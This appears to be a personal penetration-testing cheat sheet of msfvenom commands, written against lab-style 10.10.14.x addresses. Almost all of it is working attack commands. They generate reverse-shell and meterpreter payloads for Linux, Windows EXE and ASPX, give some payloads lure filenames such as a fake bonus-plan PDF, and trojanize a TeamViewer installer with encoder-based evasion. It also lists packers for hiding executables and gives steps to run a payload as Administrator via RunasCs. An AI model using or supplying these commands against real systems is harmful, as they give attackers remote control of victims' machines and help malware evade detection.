[[Payloads Explained]] [[Metasploit]] ```shell #list all the payloads msfvenom -l payloads ``` #Staged payloads create a way for us to send over more components of our attack. #Stageless payloads do not have a stage. This payload will be sent in its entirety across a network connection without a stage. ## Linux ```shell msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf ``` ## Windows ### EXE ```shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe ``` ### ASPX ```shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx ``` ### Fake TeamViewer ```shell msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 ``` ```shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=PORT -f exe -o s.exe ``` ```shell # start a reverse shell in metaspliot use multi/handler ``` ```shell # load plugins into metasploit sudo cp ./Metasploit-Plugins/pentest.rb /usr/share/metasploit-framework/plugins/pentest.rb ``` A list of popular packer software: [UPX packer](https://upx.github.io) [The Enigma Protector](https://enigmaprotector.com) [MPRESS](https://www.matcode.com/mpress.htm) Alternate EXE Packer ExeStealth Morphine MEW Themida 1. Create a shell with msfvenom, replace port `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=PORT -f exe -o s.exe` 2. Download RunasCS and unzip [https://github.com/antonioCoco/RunasCs/r...unasCs.zip](https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip) 3. Transfer s.exe and RunasCs.exe 4. Start multi/handler on port with payload windows/x64/meterpreter/reverse_tcp  and host tun0 5. ./RunasCs.exe "Administrator" "password" "s.exe"